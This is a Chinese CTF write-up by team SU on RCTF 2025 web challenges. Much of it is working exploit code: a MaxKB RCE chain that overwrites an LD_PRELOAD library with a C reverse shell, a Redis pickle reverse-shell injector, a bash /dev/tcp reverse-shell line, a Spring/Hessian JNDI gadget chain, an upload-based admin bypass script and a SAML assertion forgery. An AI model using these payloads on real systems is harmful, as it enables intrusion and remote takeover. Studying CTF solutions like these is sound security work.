本次 RCTF 我们 SU 取得了第五名 的成绩,感谢队里师傅们的辛苦付出!同时我们也在持续招人,欢迎发送个人简介至:suers_xctf@126.com 或者直接联系baozongwi QQ:2405758945。
以下是我们 SU 本次 2025 RCTF 的 WriteUp。
Web RootKB 当时看见这题俺都惊了,为什么最新版本7~8解,低版本0解
在pycharm 上对比发现 v2.3.1 和 v2.3.0 改动发现添加了sandbox.so 和 LD_PRELOAD 环境变量且sandbox.so 允许被覆盖,那么参考 LD_PRELOAD 劫持即可
感觉开发者的修法好抽象,用sandbox.so修复了一个SSRF结果又来一个RCE,俺也不知道俺也不敢问
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 """ MaxKB RCE Exploit - Complete Attack Chain 增加:远程写文件功能 write_remote_file() """ import requestsimport jsonimport sysimport osimport base64import textwrapTARGET_URL = "http://web-rootkb-minusminus-54b389641de5.rctf.rois.team" USERNAME = "admin" PASSWORD = "MaxKB@123.." API_BASE = f"{TARGET_URL} /admin/api" TOOL_DEBUG_API = f"{API_BASE} /workspace/default/tool/debug" session = requests.session() session.headers.update({ 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , 'Content-Type' : 'application/json' , 'Accept' : 'application/json' }) def login (): """Login to MaxKB and get JWT token""" login_data = { "username" : USERNAME, "password" : PASSWORD, "captcha" : "" } login_api = f"{API_BASE} /user/login" try : resp = session.post(login_api, json=login_data) if resp.status_code == 200 : result = resp.json() if 'data' in result and result['data' ] and 'token' in result['data' ]: token = result['data' ]['token' ] session.headers['AUTHORIZATION' ] = f'Bearer {token} ' print (f"[+] Login successful!" ) print (f"[+] JWT Token: {token[:50 ]} ..." ) return True else : print (f"[-] Login failed: {result} " ) return False else : print (f"[-] Login request failed: {resp.status_code} " ) return False except Exception as e: print (f"[-] Login error: {e} " ) return False def execute_python_code (code ): """Execute Python code through tool debug endpoint""" payload = { "code" : code, "input_field_list" : [], "init_field_list" : [], "init_params" : {}, "debug_field_list" : [] } try : resp = session.post(TOOL_DEBUG_API, json=payload) if resp.status_code == 200 : result = resp.json() print (result) return result.get('data' , 'No data returned' ) else : return f"HTTP {resp.status_code} : {resp.text} " except Exception as e: return f"Exception: {e} " def execute_system_command (cmd ): """Execute system command using Python equivalents""" if cmd == "id" : code = """def get_id(): import os return f"uid={os.getuid()}({os.environ.get('USER', 'unknown')}) gid={os.getgid()}" return get_id()""" elif cmd == "ls /" : code = """def ls_root(): import os items = os.listdir('/') items.sort() return "\\n".join(items) return ls_root()""" elif cmd.startswith("cat " ): filepath = cmd.split(" " , 1 )[1 ] code = f"""def read_file(): try: with open('{filepath} ', 'r') as f: return f.read() except Exception as e: return f"Error: {{str(e)}}" return read_file()""" else : code = f"""def run_cmd(): import os try: return str(os.listdir('{cmd} ')) except Exception as e: return f"Command execution failed: {{e}}" return run_cmd()""" return execute_python_code(code) def write_remote_file (remote_path, b64_content, mode="wb" ): """ 在目标机器上写二进制文件(从 base64 字符串解码) :param remote_path: 目标文件路径,例如 '/tmp/pwned.bin' :param b64_content: base64 编码后的内容(str) :param mode: 文件模式,默认 'wb',可以传 'ab' 追加二进制 """ code = f"""def write_file(): import base64 path = {remote_path!r} b64_data = {b64_content!r} mode = {mode!r} try: data = base64.b64decode(b64_data) with open(path, mode) as f: f.write(data) return f"OK: wrote {{len(data)}} bytes to {{path}} with mode={{mode}}" except Exception as e: return f"Error writing to {{path}}: {{e}}" return write_file()""" return execute_python_code(code) def execute_redis_command (host, port, password, command ): """ 在目标机器上执行 Redis 命令 :param host: Redis 服务器地址 :param port: Redis 服务器端口 :param password: Redis 密码,如果没有则为 None :param command: 要执行的 Redis 命令,以字符串形式提供,例如 "KEYS *" 或 "GET mykey" :return: 命令执行结果或错误信息 """ code = f"""def redis_cmd_runner(): try: import redis import json except ImportError: return "Error: 'redis' library not found on the target system." # 将外部传入的参数赋值给内部变量 redis_host = {host!r} redis_port = {port} redis_password = {password!r} # 如果 password 为 None,!r 会正确处理成 'None' command_str = {command!r} try: # 建立 Redis 连接 # decode_responses=False 是默认行为,我们会手动解码,以更好地处理潜在的编码错误 r = redis.Redis(host=redis_host, port=redis_port, password=redis_password, db=0) # 测试连接 r.ping() # 将命令字符串拆分成列表,以便传递给 execute_command command_parts = command_str.split() # 执行命令 raw_result = r.execute_command(*command_parts) # Redis 的返回结果通常是 bytes 或 list of bytes,需要解码 def decode_redis_result(item): if isinstance(item, bytes): return item.decode('utf-8', 'ignore') # 使用 ignore 以免遇到非 utf8 字符时崩溃 elif isinstance(item, list): return [decode_redis_result(i) for i in item] else: return item # 对于数字等类型,直接返回 result = decode_redis_result(raw_result) # 以 JSON 格式返回,统一输出 return json.dumps(result, indent=2, ensure_ascii=False) except Exception as e: return f"Redis Error: {{e}}" return redis_cmd_runner()""" return execute_python_code(code) def get_environment_variables (): """ 在目标机器上获取并返回所有环境变量 """ code = f"""def dump_env_vars(): import os try: env_data = str(os.environ) path = "/opt/maxkb-app/sandbox/env.txt" with open(path, 'w', encoding='utf-8') as f: f.write(env_data) return env_data except Exception as e: return f"Error getting environment variables: {{e}}" return dump_env_vars()""" return execute_python_code(code) def main (): """Main exploitation function""" print ("=" * 60 ) print ("MaxKB RCE Exploit - Complete Attack Chain" ) print ("=" * 60 ) print (f"[+] Target: {TARGET_URL} " ) print (f"[+] Username: {USERNAME} " ) print (f"[+] Exploit endpoint: {TOOL_DEBUG_API} " ) print ("\n[+] Step 1: Authentication" ) if not login(): print ("[-] Exploit failed - cannot login" ) return print ("\n[+] Step 2: Remote Code Execution" ) print ("\n[*] Testing code execution:" ) code = """def test(): return "RCE confirmed - Code execution successful!" return test()""" result = execute_python_code(code) print (f"[Result] {result} " ) print ("\n[+] Step 3: System Command Execution" ) commands = ["""/opt/maxkb-app/sandbox/""" , "echo 123" ] for cmd in commands: print (f"\n[*] Executing: {cmd} " ) result = execute_system_command(cmd) print (f"[Output]\n{result} " ) print ("\n[+] Step 3.5: Remote File Write Test" ) test_path = "/opt/maxkb-app/sandbox/sandbox.so" with open ("revshell.so" , "rb" ) as f: raw = f.read() b64_str = base64.b64encode(raw).decode("ascii" ) result = write_remote_file(test_path, b64_str) print (f"[Write Result] {result} " ) print ("\n[*] Read back the written file:" ) read_back = execute_system_command(f"cat {test_path} " ) print (f"[File Content]\n{read_back} " ) print ("\n[+] Step 5: PostgreSQL Database Interaction" ) db_conn_str = "dbname='maxkb' user='root' host='127.0.0.1' password='Password123@postgres'" print (f"[*] Using DB connection string (example): {db_conn_str} " ) print ("\n[*] Query 1: Listing all databases..." ) list_db_query = "SELECT datname FROM pg_database WHERE datistemplate = false;" result = query_postgresql(db_conn_str, list_db_query) print (f"[Result]\n{result} " ) print ("\n[+] Step 6: Redis Service Interaction" ) redis_host = "127.0.0.1" redis_port = 6379 redis_password = "Password123@redis" redis_commands = [ "INFO" , "KEYS *" , "GET flag" , "HGETALL user:1" , "set " ] for cmd in redis_commands: print (f"\n[*] Executing Redis command: '{cmd} '" ) result = execute_redis_command(redis_host, redis_port, redis_password, cmd) print (f"[Result]\n{result} " ) if exploit_result and "Success" in exploit_result: print (f"[+] {exploit_result} " ) print ("[!] On a vulnerable version, this could lead to RCE!" ) else : print (f"[-] {exploit_result} " ) print ("\n" + "=" * 60 ) print ("[+] EXPLOIT FINISHED" ) print ("=" * 60 ) if __name__ == "__main__" : main()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void _revshell_init(void ) __attribute__((constructor));void _revshell_init(void ) { const char *ip = "xxxx" ; const int port = 9999 ; int sockfd; struct sockaddr_in addr ; sockfd = socket(AF_INET, SOCK_STREAM, 0 ); if (sockfd < 0 ) { return ; } addr.sin_family = AF_INET; addr.sin_port = htons(port); if (inet_pton(AF_INET, ip, &addr.sin_addr) <= 0 ) { close(sockfd); return ; } if (connect(sockfd, (struct sockaddr *)&addr, sizeof (addr)) < 0 ) { close(sockfd); return ; } dup2(sockfd, 0 ); dup2(sockfd, 1 ); dup2(sockfd, 2 ); execve("/bin/sh" , NULL , NULL ); close(sockfd); }
VPS 上接收shell ,获得FLAG
RootKB– Python 沙箱绕过俺不会,但是打redis 触发 pickle 反序列化这个俺会,话不多说直接丢脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 """ MaxKB RCE Exploit - Complete Attack Chain 增加:远程写文件功能 write_remote_file() 增加:Redis Pickle 注入功能 inject_pickle_payload() 修正:修复了所有 'return' outside function 的语法错误 """ import requestsimport jsonimport sysimport osimport base64import textwrapimport pickleimport subprocessTARGET_URL = "http://xxx:8030/" USERNAME = "admin" PASSWORD = "MaxKB@123.." API_BASE = f"{TARGET_URL} /admin/api" TOOL_DEBUG_API = f"{API_BASE} /workspace/default/tool/debug" session = requests.session() session.headers.update({ 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' , 'Content-Type' : 'application/json' , 'Accept' : 'application/json' }) def login (): """ Login to MaxKB and get JWT token. Returns the token string on success, None on failure. """ login_data = { "username" : USERNAME, "password" : PASSWORD, "captcha" : "" } login_api = f"{API_BASE} /user/login" try : resp = session.post(login_api, json=login_data) if resp.status_code == 200 : result = resp.json() if 'data' in result and result['data' ] and 'token' in result['data' ]: token = result['data' ]['token' ] session.headers['AUTHORIZATION' ] = f'Bearer {token} ' print (f"[+] Login successful!" ) print (f"[+] JWT Token: {token[:50 ]} ..." ) return token else : print (f"[-] Login failed: {result} " ) return None else : print (f"[-] Login request failed: {resp.status_code} " ) return None except Exception as e: print (f"[-] Login error: {e} " ) return None def execute_python_code (code ): """Execute Python code through tool debug endpoint""" payload = { "code" : code, "input_field_list" : [], "init_field_list" : [], "init_params" : {}, "debug_field_list" : [] } try : resp = session.post(TOOL_DEBUG_API, json=payload) if resp.status_code == 200 : result = resp.json() if result.get('code' ) != 200 : print (f"[-] Server-side error: {result.get('message' )} " ) return result.get('data' , 'No data returned' ) else : return f"HTTP {resp.status_code} : {resp.text} " except Exception as e: return f"Exception: {e} " class PickleRCE : def __init__ (self, command ): self .command = command def __reduce__ (self ): return (subprocess.call, (["python3" ,"-c" ,'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxxx",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ],)) def inject_pickle_payload (redis_host, redis_port, redis_password, token, command ): """ Generates a pickle payload and injects it into Redis via the RCE vulnerability. """ print (f"[*] Crafting pickle payload to execute command: '{command} '" ) pickle_payload = pickle.dumps(PickleRCE(command)) b64_payload = base64.b64encode(pickle_payload).decode('ascii' ) redis_key = f":TOKEN:{token} " print (f"[*] Target Redis key will be: {redis_key} " ) remote_code = f""" def set_pickle_in_redis(): import redis import base64 try: r = redis.Redis(host={redis_host!r} , port={redis_port} , password={redis_password!r} , db=0) redis_key = {redis_key!r} b64_payload = {b64_payload!r} pickle_data = base64.b64decode(b64_payload) r.set(redis_key, pickle_data) return f"OK: Successfully wrote {{len(pickle_data)}} bytes of pickle data to key '{{redis_key}}'." except Exception as e: return f"Redis Error: {{e}}" set_pickle_in_redis() # <-- FIX: Removed 'return' from here """ print ("[*] Sending payload to remote server to inject into Redis..." ) return execute_python_code(remote_code) def execute_system_command (cmd ): """Execute system command using a robust method.""" code = f""" def run_cmd(): import subprocess import shlex command = {cmd!r} try: # Use shlex.split for better argument handling args = shlex.split(command) result = subprocess.run(args, capture_output=True, text=True, timeout=10) output = result.stdout if result.stdout else "" error = result.stderr if result.stderr else "" if output or error: return f"STDOUT:\\n{{output}}\\nSTDERR:\\n{{error}}" else: return "Command executed with no output." except FileNotFoundError: return f"Error: Command not found or path does not exist." except Exception as e: return f"Command execution failed: {{e}}" run_cmd() # <-- FIX: Removed 'return' from here """ return execute_python_code(code) def main (): """Main exploitation function""" print ("=" * 60 ) print ("MaxKB RCE Exploit - Complete Attack Chain" ) print ("=" * 60 ) print (f"[+] Target: {TARGET_URL} " ) print ("\n[+] Step 1: Authentication" ) token = login() if not token: print ("[-] Exploit failed - cannot login" ) return print ("\n[*] Testing basic code execution..." ) test_code = """ def test(): return "RCE confirmed - Code execution successful!" test() """ result = execute_python_code(test_code) print (f"[Result] {result} " ) if "RCE confirmed" not in str (result): print ("[-] Basic RCE test failed. Aborting." ) return print ("\n[+] Step 2: Injecting Pickle Payload into Redis for RCE" ) redis_host = "127.0.0.1" redis_port = 6379 redis_password = "Password123@redis" command_to_execute = "bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_PORT 0>&1'" result = inject_pickle_payload(redis_host, redis_port, redis_password, token, command_to_execute) print (f"[Injection Result] {result} " ) if "OK:" in str (result): print ("\n[+] Pickle payload injected successfully!" ) print ("[*] The next time the application deserializes this token from Redis," ) print (f"[*] the command '{command_to_execute} ' should be executed on the server." ) print ("[*] You may need to trigger this by making another authenticated request or simply waiting." ) print ("[*] If using a reverse shell, make sure your listener (e.g., 'nc -lvnp YOUR_PORT') is running." ) else : print ("\n[-] Failed to inject pickle payload." ) print ("\n[+] You can now try to verify if the command was executed (if you used a non-interactive command)." ) print ("[*] For example, checking if the file '/tmp/pwned_by_pickle' exists:" ) verification_result = execute_system_command("ls -l /tmp/pwned_by_pickle" ) print (f"[Verification Result]\n{verification_result} " ) print ("\n" + "=" * 60 ) print ("[+] EXPLOIT FINISHED" ) print ("=" * 60 ) if __name__ == "__main__" : main()
maybe_easy 经典JAVA 反序列化题目,复习一下SU18 巨佬文章
1 2 3 4 5 6 7 static { WHITE_PACKAGES.add("com.rctf.server.tool." ); WHITE_PACKAGES.add("java.util." ); WHITE_PACKAGES.add("org.apache.commons.logging." ); WHITE_PACKAGES.add("org.springframework.beans." ); WHITE_PACKAGES.add("org.springframework.jndi." ); }
观察发现白名单跟Spring AOP 和 Spring Context & AOP 两条链子关系很大,最后极有可能打的是JNDI
给了个chain 类存在compareTo方法,那么kick-off入口类也就确定了是TreeMap,TreeMap可以触发compareTo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 package com.rctf.server.tool;import java.io.Serializable;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Method;import java.lang.reflect.Proxy;public class Maybe extends Proxy implements Comparable <Object>, Serializable { public Maybe (InvocationHandler h) { super (h); } public int compareTo (Object o) { try { Method method = Comparable.class.getMethod("compareTo" , Object.class); Object result = this .h.invoke(this , method, new Object []{o}); return (Integer)result; } catch (Throwable e) { throw new RuntimeException (e); } } }
在idea 里面扒一扒继承InvocationHandler 接口且在白名单的类有哪些,只有这三个
EarlySingletonInvocationHandler 类看着没啥用
ServiceLocatorInvocationHandler 类最后会触发args[0]的toString 方法,利用难度太大
参考Spring1 链子易知ObjectFactoryDelegatingInvocationHandler可以自定义的ObjectFactory 类触发 getObject 方法
翻了一下找到了TargetBeanObjectFactory 这个类,恰巧SimpleJndiBeanFactory 这个类继承自BeanFactory 接口,其中的getBean 方法会触发lookup ,一切就大功告成了
PoC如下,用java-chains 打 JNDI 二次反序列化注入内存马即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 package org.example;import com.caucho.hessian.io.Hessian2Input;import com.caucho.hessian.io.Hessian2Output;import com.caucho.hessian.io.SerializerFactory;import org.apache.commons.logging.impl.NoOpLog;import org.example.tool.HessianFactory;import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor;import org.springframework.aop.target.HotSwappableTargetSource;import org.springframework.jndi.support.SimpleJndiBeanFactory;import org.springframework.scheduling.annotation.AsyncAnnotationAdvisor;import com.rctf.server.tool.Maybe;import org.springframework.beans.factory.BeanFactory;import org.springframework.beans.factory.ObjectFactory;import org.springframework.jndi.support.SimpleJndiBeanFactory;import java.io.FileInputStream;import java.io.FileOutputStream;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.util.*;public class PoC1 { public static void main (String[] args) throws Exception { String url = "ldap://xxxx:50389/4e13d5" ; SimpleJndiBeanFactory beanFactory = new SimpleJndiBeanFactory (); beanFactory.setShareableResources(url); Class<?> tboFactoryClass = Class.forName("org.springframework.beans.factory.config.ObjectFactoryCreatingFactoryBean$TargetBeanObjectFactory" ); Constructor<?> tboFactoryConstructor = tboFactoryClass.getDeclaredConstructor(BeanFactory.class, String.class); tboFactoryConstructor.setAccessible(true ); ObjectFactory<?> objectFactory = (ObjectFactory<?>) tboFactoryConstructor.newInstance(beanFactory, url); Class<?> ofdihClass = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler" ); Constructor<?> ofdihConstructor = ofdihClass.getDeclaredConstructor(ObjectFactory.class); ofdihConstructor.setAccessible(true ); InvocationHandler handler = (InvocationHandler) ofdihConstructor.newInstance(objectFactory); Maybe maybeProxy = new Maybe (handler); TreeMap<Object,Object> m = new TreeMap <>(); setFieldValue(m, "size" , 2 ); setFieldValue(m, "modCount" , 2 ); Class<?> nodeC = Class.forName("java.util.TreeMap$Entry" ); Constructor nodeCons = nodeC.getDeclaredConstructor(Object.class, Object.class, nodeC); nodeCons.setAccessible(true ); Object node = nodeCons.newInstance("RoboTerh" , new Object [0 ], null ); Object right = nodeCons.newInstance(maybeProxy, new Object [0 ], node); setFieldValue(node, "right" , right); setFieldValue(m, "root" , node); String payload_base64 = HessianFactory.serialize((Object) m); System.out.println("payload_base64: " + payload_base64); } public static void setFiled (String classname, Object o, String fieldname, Object value) throws Exception { Class<?> aClass = Class.forName(classname); Field field = aClass.getDeclaredField(fieldname); field.setAccessible(true ); field.set(o, value); } public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } public static Field getField (final Class<?> clazz, final String fieldName ) throws Exception { try { Field field = clazz.getDeclaredField(fieldName); if ( field != null ) field.setAccessible(true ); else if ( clazz.getSuperclass() != null ) field = getField(clazz.getSuperclass(), fieldName); return field; } catch ( NoSuchFieldException e ) { if ( !clazz.getSuperclass().equals(Object.class) ) { return getField(clazz.getSuperclass(), fieldName); } throw e; } } }
感谢出题师傅手下留情,俺做出来了,要是学了这么久的JAVA要是这次再爆0,俺真的会玉玉了
photographer 入口在 public/index.php,其中完成了框架加载、鉴权初始化以及路由分发。请求经过 Apache 的 .htaccess 重写进入该入口,随后由路由器将 URL 映射到控制器方法。入口代码如下:
1 2 3 4 5 6 7 require_once __DIR__ . '/../app/config/autoload.php' ;Auth ::init ();$router = new Router ();$routeLoader = require __DIR__ . '/../app/config/router.php' ;$routeLoader ($router );$router ->dispatch ();
鉴权初始化的关键在 Auth::init(),它从会话中读取当前用户 ID 并去数据库查询用户对象。注意到,这个查询把用户表 user 与图片表 photo 做了连接,并且使用了 SELECT *
1 2 3 4 5 6 7 8 9 10 11 12 13 14 class Auth { private static $user = null ; public static function init ( ) { if (session_status () === PHP_SESSION_NONE) { session_name (config ('session.name' )); session_start (); } if (isset ($_SESSION ['user_id' ])) { self ::$user = User ::findById ($_SESSION ['user_id' ]); } } public static function type ( ) { return self ::$user ['type' ]; } }
把用户类型值与 admin 的值(为 0)进行“更小于”的比较。也就是说,只有类型值小于 0 的用户才被视为“超管”。这段代码如下:
1 2 3 4 5 6 7 8 Auth ::init ();$user_types = config ('user_types' );if (Auth ::check () && Auth ::type () < $user_types ['admin' ]) { echo getenv ('FLAG' ) ?: 'RCTF{test_flag}' ; } else { header ('Location: /' ); }
再看角色值的配置,明确把 admin 定义为 0,auditor 为 1,user 为 2。
1 2 3 4 5 6 'user_types' => [ 'admin' => 0 , 'auditor' => 1 , 'user' => 2 ],
如果仅有这两处,攻击者还无法改变自己的类型为负数。但是获取查询是有问题的。User::findById 将用户表与图片表通过 LEFT JOIN 连接,并且使用 SELECT *,这会把两张表的所有列合并成一个关联数组。
如果存在同名列,右表会覆盖左表。user 表有 type(用户角色),photo 表也有 type(图片 MIME 类型)。所以只要设置了背景图(user.background_photo_id 指向某张 photo 记录)之后,查询结果中的 type 字段就来自 photo.type 而不是 user.type。代码如下:
1 2 3 4 5 6 7 public static function findById ($userId ) { return DB::table ('user' ) ->leftJoin ('photo' , 'user.background_photo_id' , '=' , 'photo.id' ) ->where ('user.id' , '=' , $userId ) ->first (); }
Auth::type() 实际上读取的是图片的 type 字段。只要我们能让某张图片的 type 变成一个“可被 PHP 比较为更小于 0 的值”,就能在 superadmin.php 中通过“超管”判断。
图片的 type 是从上传接口写入的,这个接口直接把 $_FILES['type'] 原样存进数据库,而 $_FILES['type'] 由请求中的 multipart/form-data 文件分段头的 Content-Type 决定,完全可由客户端控制:
1 2 3 4 5 6 7 8 9 $result = Photo ::create ([ 'user_id' => Auth ::id (), 'original_filename' => $file ['name' ], 'saved_filename' => $savedFilename , 'type' => $file ['type' ], 'size' => $file ['size' ], ... ]);
图片校验函数 isValidImage 并不校验或规范化客户端提交的 Content-Type,它仅验证扩展名、大小以及 getimagesize 是否能读出基本信息。因此我们既可以上传一张合法的 PNG/JPG 文件来满足这些检查,又可以在分段头将 Content-Type 写成任意字符串(例如 -1)。
1 2 3 4 5 6 7 8 9 10 function isValidImage ($file ) { $allowedExtensions = config ('upload.allowed_extensions' ); $ext = strtolower (pathinfo ($file ['name' ], PATHINFO_EXTENSION)); if (!in_array ($ext , $allowedExtensions )) return false ; if ($file ['size' ] > config ('upload.max_size' )) return false ; $imageInfo = @getimagesize ($file ['tmp_name' ]); if ($imageInfo === false ) return false ; return true ; }
所以思路清晰了,首先在 /register 完成正常注册登录,随后构造原始 multipart/form-data 请求体,将文件分段头设为 Content-Type: -1 上传一张满足扩展名和 getimagesize 的合法图片,得到这张图片的 photo_id。然后调用 /api/user/background 将其设为当前用户的背景图。此时再访问 superadmin.php,由于 Auth::type() 读取的是 photo.type 且它是 -1,满足 < admin(0),服务器就会返回 FLAG。
1 2 3 4 5 6 7 8 9 POST /api/photos/upload HTTP/1.1 Content-Type : multipart/form-data; boundary=----XContent-Disposition: form-data; name="photos[]" ; filename="x.png" Content-Type : -1 PNG_BYTES...
exp 如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 import reimport jsonimport timeimport osimport sysimport subprocessimport tempfileimport urllib.parseimport randomimport stringIMG_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), "public/assets/img/default-avatar.png" )) BASES_DEFAULT = [ "http://1.95.160.41:26000" , "http://1.95.160.41:26001" , "http://1.95.160.41:26002" , ] TIMEOUT = 20 def run (cmd ): return subprocess.run(cmd, shell=True , capture_output=True , text=True ).stdout def get_csrf_from_html (html ): m = re.search(r'name="csrf_token"\s+value="([^"]+)"' , html) return m.group(1 ) if m else None def curl_get (url, cookie=None ): copt = f"-b {cookie} " if cookie else "" return run(f"curl -s {copt} {url} " ) def curl_post_form (url, data, cookie ): payload = urllib.parse.urlencode(data) return run(f"curl -s -c {cookie} -b {cookie} -X POST {url} -d \"{payload} \"" ) def build_multipart_body (img_bytes, field_name="photos[]" , filename="x.png" , forced_ct="-1" ): boundary = "----TraeBoundary" + "" .join(random.choice(string.ascii_letters + string.digits) for _ in range (16 )) head = ( f"--{boundary} \r\n" f'Content-Disposition: form-data; name="{field_name} "; filename="{filename} "\r\n' f"Content-Type: {forced_ct} \r\n\r\n" ).encode() tail = f"\r\n--{boundary} --\r\n" .encode() body = head + img_bytes + tail return boundary, body def curl_post_multipart (url, boundary, body_path, cookie ): return run(f"curl -s -b {cookie} -H 'Content-Type: multipart/form-data; boundary={boundary} ' --data-binary @{body_path} {url} " ) def exploit_base (base ): port = base.split(":" )[-1 ] cookie = f"/tmp/photographer_{port} .cookie" reg_html = run(f"curl -s -c {cookie} {base} /register" ) csrf = get_csrf_from_html(reg_html) if not csrf: return f"{base} no csrf" , None email = f"exp_{int (time.time())} _{random.randint(1000 ,9999 )} @example.com" curl_post_form(f"{base} /api/register" , { "csrf_token" : csrf, "username" : "ctfuser" , "email" : email, "password" : "pw12345" , "confirm_password" : "pw12345" }, cookie) with open (IMG_PATH, "rb" ) as f: img_bytes = f.read() boundary, body = build_multipart_body(img_bytes, field_name="photos[]" , filename="x.png" , forced_ct="-1" ) body_path = tempfile.mktemp(prefix="photographer_body_" , suffix=".bin" ) with open (body_path, "wb" ) as bf: bf.write(body) up_json = curl_post_multipart(f"{base} /api/photos/upload" , boundary, body_path, cookie) try : up = json.loads(up_json) pid = up["photos" ][0 ]["id" ] except Exception: return f"{base} upload parse failed" , None settings_html = curl_get(f"{base} /settings" , cookie) csrf2 = get_csrf_from_html(settings_html) if not csrf2: return f"{base} settings csrf missing" , None curl_post_form(f"{base} /api/user/background" , { "photo_id" : pid, "csrf_token" : csrf2 }, cookie) flag = curl_get(f"{base} /superadmin.php" , cookie) return "ok" , flag.strip() def main (): bases = sys.argv[1 :] or BASES_DEFAULT results = [] for base in bases: try : status, flag = exploit_base(base) results.append((base, status, flag)) except Exception as e: results.append((base, "error" , str (e))) for base, status, flag in results: print (f"{base} -> {status} -> {flag or '<no output>' } " ) if __name__ == "__main__" : main()
auth
authController.register 只在 parseInt(type) === 0 时才检查邀请码,因此我用 type=0x10 绕过了这一校验(见 idp-portal/src/controllers/authController.js (line 27))并完成了注册,但用户实际存储的 type 依然不为 0,所以 SAML 入口仍拒绝(samlController.idpInitiatedSSO/sso 均在 idp-portal/src/controllers/samlController.js (line 13) 和 (line 176) 处要求 req.session.userType === 0)。
SP/admin 只检查会话中的 email 是否等于 admin@rois.team (sp-flag/app.py (line 88)),而自身的 SAML 验证足够严格;于是我写了 saml_exploit.py (line 1),自动注册、登录、触发 IDP 发回的 SAMLResponse,串联两份 Assertion 并把其中一个的 NameID 改成 admin 后再提交给 SP,成功绕过了权限并拿到了管理员页。
脚本附上
